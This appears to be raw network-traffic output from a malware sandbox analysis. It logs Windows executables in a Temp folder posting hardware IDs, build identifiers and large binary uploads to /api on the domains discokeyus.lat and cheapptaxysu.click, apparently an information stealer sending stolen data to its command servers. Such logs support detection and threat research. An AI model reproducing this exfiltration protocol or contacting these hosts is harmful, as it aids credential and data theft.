                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC15331OUTData Raw: 34 7b 77 36 7b b0 8d ae a6 fd f4 69 c3 55 56 38 6a fa ce 7e e6 e5 e3 86 00 a6 f0 71 cf 10 2f ff 59 8a dd fd 1f 8b c7 86 6c 1b 62 84 cb ff 61 8b c5 de ed 97 a4 83 eb 1c 76 1f 42 6e 67 8a 18 e7 18 e4 82 dc 48 97 55 82 8c fd a3 98 46 cb a4 0e 7b 4e 5a e0 eb 3a 7e e7 64 ef ef 9e 90 8f 71 7a f7 cc 3e 26 f2 24 aa cd 3a 70 7f 94 ed 84 b5 d4 26 fb 6a 65 6d a2 8e 2a 5c 76 78 b8 4f 0d 0c f7 a1 50 e6 ff 57 04 71 1f 93 e6 38 ca 4e fc d9 93 87 cd 72 3e 28 3a 02 51 eb 30 f3 9d db d7 a7 25 4e e8 fe 2c bb 3e a1 17 ea 0d e6 31 6d f8 6b b4 87 0e d3 f8 58 b2 84 fe 77 4f 0d 11 6b 2d d9 be 8c e8 7f 54 01 a8 a6 3c b4 1e e4 b5 ba 93 0e f3 22 ef 00 2a 15 9d 1f f6 c4 26 19 af a3 57 6f aa 28 7e 9a c6 03 24 2c 72 54 e7 d3 a1 66 2e 78 02 a7 86 b2 e3 7b 6b c1 9f 64 fe d8 7c 4a ff 40
                                                                                                                                                                                                                                                            Data Ascii: 4{w6{iUV8j~q/YlbavBngHUF{NZ:~dqz>&$:p&jem*\vxOPWq8Nr>(:Q0%N,>1mkXwOk-T<"*&Wo(~$,rTf.x{kd|J@
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC15331OUTData Raw: fc 93 76 b7 3b 40 1f 3f 43 73 80 a2 1f 81 6d 4b 9c 6a ad 6c c9 71 30 b9 d8 b2 9a fc a1 6d c6 e5 e3 c4 cd 2a 70 48 3c 44 a1 f5 b7 79 b9 7a 90 cb 5b 1a 24 5a 9a 1d 8a 16 a6 82 ff 68 05 f0 db 1a 89 6e 55 81 88 d2 bf 85 55 7a 00 68 cc 99 b3 8c b0 80 0e 79 22 ad 19 19 7d e7 43 9f 4f 40 98 b8 ba 38 42 3e 7e 65 25 99 9e 60 10 85 a1 c4 19 51 df 7e 64 b6 fc 4f 66 8b 40 52 59 e6 fc 3e b4 c2 96 45 c1 66 7e 15 62 b1 d1 97 72 1b 69 16 fc 09 35 a6 8a 5f bd 4b d4 58 b8 3e 89 12 ce 9d 8e 91 14 eb e6 93 50 e8 37 b1 a0 1a fc 91 d0 a3 39 b8 a3 f6 d6 74 e7 bd 6f db a2 05 ff 9c f3 4a bf 0c 6f bd 85 30 64 4a 2a 0d c0 2e a8 b7 a6 74 d4 0e e9 97 1e 9d d2 4f 0d 2d 97 c4 68 b0 e0 57 99 cb a9 09 8c fa b5 04 ab 8c 7d 7f f2 84 19 e2 a2 dc 6e f1 b6 31 e4 e2 0e 09 8b ea fd 84 2c 85 e4
                                                                                                                                                                                                                                                            Data Ascii: v;@?CsmKjlq0m*pH<Dyz[$ZhnUUzhy"}CO@8B>~e%`Q~dOf@RY>Ef~bri5_KX>P79toJo0dJ*.tO-hW}n1,
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC15331OUTData Raw: 2f e9 87 9e 59 b6 91 23 4f 67 99 96 1c 95 3a 4d 63 a9 0c 12 11 93 59 e7 d5 5c da b3 24 4d cf 9d e3 83 be 9d d5 65 0e 44 77 e4 3e c7 c7 01 d8 72 65 99 7d 8b ec 4b 5f 64 db 19 b0 ef 2d fa c3 9b ae ff 99 6b bc 7b 6d f0 5b e9 6f da 80 7c 4a bc 9c e3 11 5e 51 3b ae 61 38 21 94 0c 42 b6 c9 5d aa f8 16 7a 15 f7 59 fd f2 38 6d d2 d4 47 7f 54 0c 2d 13 8d 30 b9 37 06 53 06 4d 0e c7 6b d3 79 0d 1c ab 9b 13 9e f7 bd 3e f8 8b bb 83 bc e8 06 e1 a4 5c 05 f7 4a 97 ad 86 fb 68 d6 07 2b 61 72 fd 89 21 87 58 8f 8b 2b 40 cb 1a 19 6b 27 af c6 05 27 f5 72 93 a6 fb 11 93 b2 88 e2 04 fe fb 3b f9 1a 21 1a 17 ac af 81 f4 67 6f 81 2a 3b d6 95 0b 43 ac cd 72 90 a4 12 50 c5 fe 37 c2 00 6f d9 bf 76 2b e0 1e 73 88 63 c7 15 90 aa e8 cd d2 81 08 eb c3 be c2 a9 66 78 f1 65 56 5b ff 6e 33
                                                                                                                                                                                                                                                            Data Ascii: /Y#Og:McY\$MeDw>re}K_d-k{m[o|J^Q;a8!B]zY8mGT-07SMky>\Jh+ar!X+@k''r;!go*;CrP7ov+scfxeV[n3
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC15331OUTData Raw: 1f 40 81 94 98 93 7b 6d 63 dc 33 76 89 24 ef e4 32 af 53 b9 d3 12 17 b0 21 d2 59 fb 38 46 61 ec a7 c2 e5 3f 60 23 bc 1f a9 78 fe c3 f9 89 6e a0 c3 0e 9b 03 ab aa 6b a0 a4 b0 e6 41 46 c9 90 54 f8 d5 a5 c4 6f 61 d8 21 20 19 b7 e1 08 af e8 b0 5e 66 79 55 e4 8a cd d6 e8 6b 69 b8 23 ba 47 b5 4e 27 22 06 17 8d 48 9d 6b fc 23 a8 4e 6a 9f a3 f5 a1 5f ec b7 34 50 07 88 13 c9 5f 47 4a b2 5a 06 18 69 b0 db 67 ee dc fd f8 23 a4 f9 e3 58 8c fb a5 5a 14 b1 5e ff 3a ff c8 f7 17 dc 58 e7 d1 01 f2 0a 66 ad bc 4c 92 c4 3f 4c 8a 3b 3f b6 9e 55 f7 bb 88 64 7c 97 ae c8 c2 01 b9 e9 f4 cd af 00 a0 8e 80 65 f5 82 0e 74 c6 4b 7e 9c eb 7c 82 b1 1f 7a ea 54 16 1f cd 01 72 9b fc d3 a3 d2 d4 d8 f1 f5 1f 27 84 6b 7a 9a 89 6f 5f 40 57 32 16 9a 18 ca 50 24 67 ee 9b 31 0c 8c 20 be 66 34
                                                                                                                                                                                                                                                            Data Ascii: @{mc3v$2S!Y8Fa?`#xnkAFToa! ^fyUki#GN'"Hk#Nj_4P_GJZig#XZ^:XfL?L;?Ud|etK~|zTr'kzo_@W2P$g1 f4
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC15331OUTData Raw: d0 6a 87 4f be 86 fb d3 24 ab 87 85 42 8c 8a 14 81 d4 bf 7f fb 6c 2c 2d 96 87 3c 55 87 62 26 b5 18 62 72 a7 1b 25 98 92 59 cf e1 17 2f a1 63 48 13 9c 0f 27 ff 4b b8 5c aa 9b f1 5c bf 4e 63 27 32 95 03 9b 55 76 dd 0e c6 d5 f0 28 a5 f4 86 dd b1 f4 79 35 92 b9 7b 2e 70 61 2c 27 13 c3 b0 b1 7a 3b 09 b2 14 d1 b4 e5 56 42 a3 2e 55 d1 16 c6 1e ee e8 fa 3f bf 1e 18 e2 2b bf b9 9b c5 34 a7 a3 e4 ca 01 66 87 ef 0c b4 30 42 b2 49 ae f5 60 fa 96 59 e5 18 af 3c 42 31 23 4c 80 69 fb 05 dc 90 41 7b ac 9b 29 9e 3a fa eb 2c 38 ad 2e d0 fc 17 26 92 16 32 55 ed e0 8b bb da 76 e7 44 8b 13 40 8c a2 45 a0 3f dc 30 f2 98 11 df 9d 48 9d b9 78 94 83 d6 5a 06 bd 97 e1 33 27 b6 00 a4 96 d4 f0 95 14 5f 90 73 c2 e8 ff 3e b1 f2 cf 27 7e b4 f1 0f 0a 19 25 70 09 ca 7b 80 d4 4b 27 f8 c7
                                                                                                                                                                                                                                                            Data Ascii: jO$Bl,-<Ub&br%Y/cH'K\\Nc'2Uv(y5{.pa,'z;VB.U?+4f0BI`Y<B1#LiA{):,8.&2UvD@E?0HxZ3'_s>'~%p{K'
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC15331OUTData Raw: 50 cc fe 4f d8 b1 e1 7b 61 64 b7 61 fd 45 1e 78 38 93 08 e1 97 f5 26 f4 3d 8b 02 20 89 77 03 27 b5 0e a6 2a 31 f6 23 0f b3 aa 53 90 87 fb 94 af 95 c4 9b 49 30 f0 b5 e2 56 eb 01 a9 2c 14 b7 d3 9f 44 bd be 08 7d 69 0c ce 69 57 ea e0 6e f3 d5 a1 c0 7f a7 04 fc 47 9a c6 7d fa e1 ae 2f a8 11 81 5c 11 14 81 cb 5f aa 6b 94 f7 c6 c9 40 79 a2 6f 74 9e e4 9b 1a 82 0e af a3 31 7c bb ae 0c 2c fb 8a 73 21 a0 22 16 79 ba ec ac 83 2d ab 24 1d a8 4c 78 97 0c 7e 7d f9 c0 1b d5 3e f1 e2 b8 e5 bc eb 84 1f af a3 1d 4d 46 71 7b 9a 71 39 29 a2 78 fb 70 f7 26 a6 ff 9f 44 8c 45 0a 7f 47 18 5d 03 ae 59 f9 05 3e 3b a8 6c 76 78 0c 32 fc fd fb 55 a0 23 98 f0 2f d8 3b 59 03 4d df 3e 93 76 d0 01 7b b0 57 5a b1 1a 05 b7 87 84 7e 77 70 74 64 a8 31 e7 39 93 09 7c dd e6 e8 f0 a3 d9 cf 3d
                                                                                                                                                                                                                                                            Data Ascii: PO{adaEx8&= w'*1#SI0V,D}iiWnG}/\_k@yot1|,s!"y-$Lx~}>MFq{q9)xp&DEG]Y>;lvx2U#/;YM>v{WZ~wptd19|=
                                                                                                                                                                                                                                                            2024-12-21 21:18:12 UTC9219OUTData Raw: 05 39 8e b8 d5 2c f3 13 93 ce 5b 72 91 b5 78 91 54 c7 51 e4 f8 f1 fe 4f 5e 35 bf b0 7c 32 1d b8 85 d4 c3 bf 1b 01 cc 4b 49 03 a4 b9 d8 03 7f fc 5e c9 46 8c 8a 67 35 bf db 7b d2 8a bc 57 e8 b9 14 35 2f fc 40 44 54 6a 4a 58 09 d8 9d 6f 8a 6b 76 db 92 ff 48 0b 7b 34 5d a2 a5 f0 d9 67 18 45 40 03 c0 4b 49 e1 1f 33 de 52 d6 8b ed 11 35 2f cd 7c 59 4f bc a4 4d dc 97 3c 3b d0 07 a5 e5 c3 c5 7d e5 e1 30 2f 53 1d bc 8e 9c 5f 67 45 22 81 2b 78 cb 3b ac 30 15 ce 97 c6 6a 75 7d 6e df 06 56 08 4d 36 ce 27 af 35 35 20 03 ec 75 f7 68 fc a8 5a 9d fb 42 94 44 13 63 ad 3e 93 3f 8e 59 b0 1c 2c 72 49 fd e6 5d 94 21 bd 87 dd e8 7b 36 b5 fc ea 6c f1 c1 d8 49 3f d5 d3 1a a8 02 b4 d4 c6 43 70 85 62 e1 9e 67 90 7b dc e8 7e a6 4f 50 90 2b 8a b6 47 70 2a 58 fb 37 e3 76 96 db f8 1c
                                                                                                                                                                                                                                                            Data Ascii: 9,[rxTQO^5|2KI^Fg5{W5/@DTjJXokvH{4]gE@KI3R5/|YOM<;}0/S_gE"+x;0ju}nVM6'55 uhZBDc>?Y,rI]!{6lI?Cpbg{~OP+Gp*X7v
                                                                                                                                                                                                                                                            2024-12-21 21:18:14 UTC1142INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:14 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=6m6rl96v08golcjul1o6p59gan; expires=Wed, 16 Apr 2025 15:04:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W5rSRFLOBH4P9HHiGjpx9%2B4%2FUQVAssKwU7qFa0MBptdSfOOUDVxCKm5PUnnf%2BUQHmKjAu9IE%2FfUpjSed%2ByGjkr7B73wQPCljmE8MBu5z6O%2FsVeVpx6%2FpX1o%2Foxvc9NSVBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae742af6d42d7-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1585&rtt_var=620&sent=56&recv=158&lost=0&retrans=0&sent_bytes=2833&recv_bytes=148527&delivery_rate=1842271&cwnd=245&unsent_bytes=0&cid=56fc6777849c6d44&ts=1655&x=0"


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            58192.168.2.449959104.21.21.99443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:13 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=KZMFN5STOWJBE9R
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8766
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:18:13 UTC8766OUTData Raw: 2d 2d 4b 5a 4d 46 4e 35 53 54 4f 57 4a 42 45 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 5a 4d 46 4e 35 53 54 4f 57 4a 42 45 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 5a 4d 46 4e 35 53 54 4f 57 4a 42 45 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4b 5a 4d 46 4e
                                                                                                                                                                                                                                                            Data Ascii: --KZMFN5STOWJBE9RContent-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--KZMFN5STOWJBE9RContent-Disposition: form-data; name="pid"2--KZMFN5STOWJBE9RContent-Disposition: form-data; name="lid"PsFKDg--pablo--KZMFN
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:25 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=02472iivf99vn32oolilaaq0lp; expires=Wed, 16 Apr 2025 15:05:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=khnicWFD6pXwlxDXOddvCAl15onwDFydhOq%2F4PD8I1o6aGMfsEu8pd5YlOIth%2FLunPrTFfukcxhC62V8vxcTGPGBtDpARROjdc8%2BpBq5BTLzQXXxJ9ykgFRnXi%2Fd2DwKjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae7480e9f4369-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1693&rtt_var=648&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2831&recv_bytes=9700&delivery_rate=1670480&cwnd=234&unsent_bytes=0&cid=cf222f56578864f0&ts=12358&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            59192.168.2.449962104.21.21.99443280C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:16 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 82
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:18:16 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=ACBF7AD21FC990D4AC8923850305D13E
                                                                                                                                                                                                                                                            2024-12-21 21:18:17 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:16 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=idvd4pd7qbtmkg0evdh3b8d8tp; expires=Wed, 16 Apr 2025 15:04:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nDIdRXCoPrEekTWCBWgpoSJr41g4KemQyOUKm7RGc4AGaIyB1fZX2u0eHAs1jOiBugNtVXKXX8CGawW3mZugrN6M3tm%2Bfjk%2FvzhTKynwmFHGwsliyEzrGFNH3dWt8qbcsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae75a1f7c436a-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1704&rtt_var=649&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=980&delivery_rate=1672394&cwnd=184&unsent_bytes=0&cid=f1b18211ddba4f3b&ts=783&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:17 UTC214INData Raw: 64 30 0d 0a 38 62 79 32 76 36 44 5a 65 59 66 42 73 33 78 36 41 42 6a 65 6f 66 6f 6f 4d 64 44 6d 57 68 52 50 36 6d 4d 36 49 33 77 66 65 30 53 71 78 35 54 4b 67 75 4e 62 37 37 58 48 44 45 42 63 4e 34 4b 4f 79 78 41 45 2f 74 52 72 49 57 48 62 55 67 6b 4e 54 53 6b 6e 61 35 37 61 30 4f 4f 50 76 52 7a 68 37 39 59 45 48 79 49 30 2f 4d 65 4f 43 67 76 67 79 6e 68 78 62 64 42 54 52 77 38 48 50 51 35 6d 79 35 37 65 79 39 53 70 51 39 76 75 37 31 4e 4c 4f 43 33 77 6b 38 73 64 48 2b 48 58 61 54 70 2b 33 44 38 56 55 41 68 36 47 69 6d 74 6b 38 54 65 7a 72 30 57 36 75 2f 57 42 42 38 69 4e 50 7a 48 6a 67 6f 4c 34 4d 70 34 63 57 33 51 55 30 64 2b 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: d08by2v6DZeYfBs3x6ABjeofooMdDmWhRP6mM6I3wfe0Sqx5TKguNb77XHDEBcN4KOyxAE/tRrIWHbUgkNTSkna57a0OOPvRzh79YEHyI0/MeOCgvgynhxbdBTRw8HPQ5my57ey9SpQ9vu71NLOC3wk8sdH+HXaTp+3D8VUAh6Gimtk8Tezr0W6u/WBB8iNPzHjgoL4Mp4cW3QU0d+
                                                                                                                                                                                                                                                            2024-12-21 21:18:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            60192.168.2.449964104.21.67.146443692C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:17 UTC374OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=T2VOUKMEQW4S9WT6K7L
                                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=UK5f.kGqs4s6b_2zbAsIvGYwo4.3VSBZmtv09cMrxTk-1734815877-0.0.1.1-/api
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 20446
                                                                                                                                                                                                                                                            Host: cheapptaxysu.click
                                                                                                                                                                                                                                                            2024-12-21 21:18:17 UTC15331OUTData Raw: 2d 2d 54 32 56 4f 55 4b 4d 45 51 57 34 53 39 57 54 36 4b 37 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 54 32 56 4f 55 4b 4d 45 51 57 34 53 39 57 54 36 4b 37 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 54 32 56 4f 55 4b 4d 45 51 57 34 53 39 57 54 36 4b 37 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65
                                                                                                                                                                                                                                                            Data Ascii: --T2VOUKMEQW4S9WT6K7LContent-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--T2VOUKMEQW4S9WT6K7LContent-Disposition: form-data; name="pid"3--T2VOUKMEQW4S9WT6K7LContent-Disposition: form-data; name="lid"CZJvss--ge
                                                                                                                                                                                                                                                            2024-12-21 21:18:17 UTC5115OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4
                                                                                                                                                                                                                                                            Data Ascii: `M?lrQMn 64F6(X&7~
                                                                                                                                                                                                                                                            2024-12-21 21:18:18 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:18 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=tcpq7jn5geh18da2e9an66nii1; expires=Wed, 16 Apr 2025 15:04:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VCANYGpwCKgOZADSc4yXdHh393vRgdQncHZZaanDzvySRxtpdCpH8vWL8l8AhlpDeRJ0RnmlE0E3wWm5iqYwyitrCLLxcXbZKCOb34KkybmXX2qRePO8Z6IZjCQMUUVopOB3Oas%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae75f0fe28c7d-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2046&min_rtt=2035&rtt_var=785&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21500&delivery_rate=1375412&cwnd=239&unsent_bytes=0&cid=b2960cec6b489004&ts=1256&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:18:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            61192.168.2.449969104.21.67.146443692C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
